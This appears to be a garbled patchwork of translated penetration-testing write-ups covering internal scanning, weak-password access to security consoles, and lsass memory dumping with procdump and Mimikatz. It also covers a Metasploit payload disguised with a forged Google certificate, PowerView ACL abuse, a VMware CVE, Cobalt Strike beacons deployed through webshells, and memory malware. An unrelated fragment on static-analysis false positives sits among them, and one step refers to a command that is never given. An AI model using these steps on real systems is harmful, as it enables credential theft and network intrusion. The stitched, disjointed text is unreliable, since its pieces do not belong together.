So I added my IP address to the ACL rule set 2001. After adding the ACL rule, I could connect.
I tried using Plink to forward data from SSH into the intranet, but the security devices are different from Linux and cannot be proxied.
Previously, internal network detection relied on timeout sockets, but this time, timeout sockets failed to find any assets, including some existing targets. F-NAScan was then used to scan and find many live hosts.
These hosts contained relatively few applications but many devices, and many had weak passwords, which I won't go into detail about here. I'll mainly focus on the discovery of centralized devices.
Two centralized devices were discovered on the internal network. One was an endpoint detection system from a certain vendor, as shown below. Common passwords were tried, but access was unsuccessful.
The second was an endpoint detection system from another vendor; a weak password allowed access to the backend.
procdump.exe dumps the memory of the lsass.exe process, copies the resulting lsass.dmp file to the local machine, and then uses Mimikatz on the local machine to obtain the hash and plaintext. The lsass.exe process contains password information; Procdump is used to retrieve this information from lsass.exe. The command is:
procdump -accepteula -ma lsass.exe lsass.dmp
Place cer.cet in the HTTP server directory and start listening using Metasploit Framework (MSF). Then, execute the following command on the target machine to obtain the reverse session.
The attacking machine uses OpenSSL to simulate Google's SSL certificate information, which can be modified. After generation, an encrypted file named www.google.com.pem will be produced. The private key and certificate can be viewed using the command
cat www.google.com.pem
After creating the certificate, we can create an HTTP or HTTPS payload using MSF and provide a PEM format certificate for connection verification. This can be combined with other anti-virus evasion techniques. After generation, a malicious file named update.exe will be produced.
Delegation token: Used for interactive session login (e.g., direct login as a local user, remote desktop login). Impersonation token: Used for non-interactive login (using net use to access shared folders).
Use the PowerView tool to check the user's GenericAll permissions.
powershell -exec bypass
Import-Module .\PowerView.ps1
# Get the access control list (ACL) of AD objects for user man1, filtering to return entries with "GenericAll" rights
Get-ObjectAcl -SamAccountName man1 -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
As you can see, the spotless user has GenericAll permissions on the delegate user. Therefore, having obtained the spotless user's permissions, we can take over the delegate user's permissions.
Seeing IIS permissions, I tried to escalate them first, then requested system privileges to the client. Various privilege escalation methods were used, but all failed.
I tried uploading an EXE file, but the website blocked my test IP. Changing the IP and refreshing the folder showed the EXE was successfully uploaded, but the file was corrupted.
I discovered the server had Git installed. Testing git clone https://github.com/xxx/ successfully downloaded the file to C:\ProgramData\. What? Wasn't it supposed to be a non-HTTP network? I checked netstat -ano...
First, version detection: the current version is 6.7.2. Although the scan detected vulnerability 21972, such machines often also have a chance of being affected by CVE-2021-22005. The reason for trying 22005 first is that the privileges obtained from 21972 are not root, so privilege escalation would be required afterwards, which is very troublesome.
Use the same method to access host 141.
Use the trojan you just used to penetrate the domain controller, or generate a new trojan.
Upload it to host 143.
Copy beacon2.exe to host 141.
Generate a payload using CS.
Copy the generated txt file and execute it using the terminal of a webshell management tool such as China Chopper or AntSword.
After a short while, you will see that it is online.
Another common cause of false positives is user-defined sanitizers, such as those using regular expressions to validate or filter input. Let's take validation as an example, since it also requires additional consideration of control flow. To properly handle this example, you need to: (1) be able to analyze the effect of the regular expression /^[a-zA-Z0-9_]+$/ on different vulnerability classes; (2) take into account that preg_match($pattern, $username) is evaluated within the if branch. This is called control flow sensitivity.
Here's our memory malware. If you use the memory malware directly, it will only display "you_are_successful!!!!!!!!!" and won't execute any commands.